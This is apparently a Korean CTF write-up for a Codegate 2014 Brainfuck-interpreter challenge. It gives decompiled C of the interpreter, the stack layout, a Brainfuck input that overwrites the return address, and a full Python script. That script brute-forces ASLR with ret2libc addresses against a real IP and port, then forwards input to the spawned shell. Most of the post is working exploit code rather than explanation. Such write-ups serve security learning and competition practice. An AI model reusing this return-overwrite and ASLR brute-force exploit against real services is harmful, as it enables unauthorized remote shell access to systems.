본문
python 파일은 왜 있는지 모르겠다. 이것 때문에 더 헤깔렸네ㅡㅡ..
리버싱을 해보면. ret를 바꿀 수 있는 부분을 찾을 수 있다. 코드가 복잡해보여서 그렇지 자세히 보면 그다지 어렵진 않다.
그런데, ASLR을 어떻게 우회할 지 방법을 모르겠다. 그래서 그냥 brute force로 하기로......
생각보다 빨리 결과가 나온다..ㅎㅎ
unsigned char arg2[4001]={0,},arg1[4001]={0,},arg3[4001]={0,};
read( 0,arg1,4000);
_f(arg1,arg2,(unsigned long*)arg3,0,0,0,0,100000,0,0);
void __cdecl f(char *inbuf, char *buf2, int *buf3, int *index_ptr, int *depth_ptr, int a6, int index, int remain, unsigned int cnt, int depth) { size_t buflen; // eax@34 if ( index_ptr ) { if ( depth_ptr ) { if ( *depth_ptr ) { ++*index_ptr; if ( *index_ptr < strlen(inbuf) ) { if ( inbuf[*index_ptr] == ']' ) --*depth_ptr; if ( inbuf[*index_ptr] == '[' ) ++*depth_ptr; f(inbuf, buf2, buf3, index_ptr, depth_ptr, a6, index, remain, cnt, depth); } } } } if ( !index_ptr || !depth_ptr ) { if ( inbuf[index] == '<' ) --a6; if ( inbuf[index] == '>' ) ++a6; if ( inbuf[index] == '+' ) ++buf2[a6]; if ( inbuf[index] == '-' ) --buf2[a6]; if ( inbuf[index] == '.' ) write(1, &buf2[a6], 1u); if ( inbuf[index] == ',' ) read(0, &buf2[a6], 1u); if ( inbuf[index] == ']' && cnt ) { if ( !buf2[a6] ) --cnt; index = buf3[cnt]; } if ( inbuf[index] == '[' ) { depth = 1; if ( buf2[a6] ) { if ( cnt <= 999 ) { ++cnt; buf3[cnt] = index; } } else { f(inbuf, buf2, buf3, &index, &depth, a6, index, remain, cnt, depth); } } ++index; buflen = strlen(inbuf); if ( buflen > index ) { --remain; if ( remain ) f(inbuf, buf2, buf3, index_ptr, depth_ptr, a6, index, remain, cnt, depth); } } }stack... f function [sfp][ret][argu(40byte)][16byte dummy][buf2][inbuf][buf3] <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,>,> 이런식으로 하면 일단 RET는 덮어써진다. ASLR을 어떻게 우회할 수 있을까?..그냥 brute force 해볼까?..
v
#!/usr/bin/python #cmd_sub.py import sys import os import time import popen2 import struct import subprocess def run_command(command): p = subprocess.Popen(command, shell=True, stdin=subprocess.PIPE, ) return p #return p.communicate() def execute(cmd) : std_out, std_in, std_err = popen2.popen3(cmd) return std_in, std_out, std_err #cmd = ["./ioccc_fa20522ed15c4956e18388ac02b7c951"] cmd = ["nc 58.229.183.22 1234"] count = 0 while 1 : print "try ", count count += 1 #std_in, std_out, std_err = execute(cmd) p = run_command(cmd) std_in = p.stdin randombase = 0xb75a2000 dbase = 0xb7e13000 payload = ( struct.pack("<L", 0xb7ecee40 - dbase + randombase) + struct.pack("<L", 0xb7ece450 - dbase + randombase) + struct.pack("<L", 0xb7f7db98 - dbase + randombase) ) #payload = "\xb7\xec\xee\x40\xb7\xec\xe4\x50\xb7\xf7\xdb\x98\x00\x00\x00\x00" std_in.write("<"*61+",>"*len(payload)+"\n") std_in.flush() time.sleep(0.2) std_in.write(payload) std_in.flush() br = 0 for i in range(0,30) : time.sleep(0.1) try : std_in.write("ls -al . ..\n") except : br = 1 break if br == 1 : continue while 1: line =sys.stdin.readline() std_in.write(line) std_in.write("\n") std_in.flush()
'WarGame' 카테고리의 다른 글
[Codegate 2014 CTF] 120 (0) | 2014.02.27 |
---|---|
[Codegate 2014 Junior CTF] RunCommand (0) | 2014.02.14 |
[Codegate 2014 Junior CTF] Closure (2) | 2014.02.14 |
[suninatas] Cipher III : Frequency analysis (0) | 2014.02.13 |
[Codegate 2014 Junior CTF] review.. (0) | 2014.02.12 |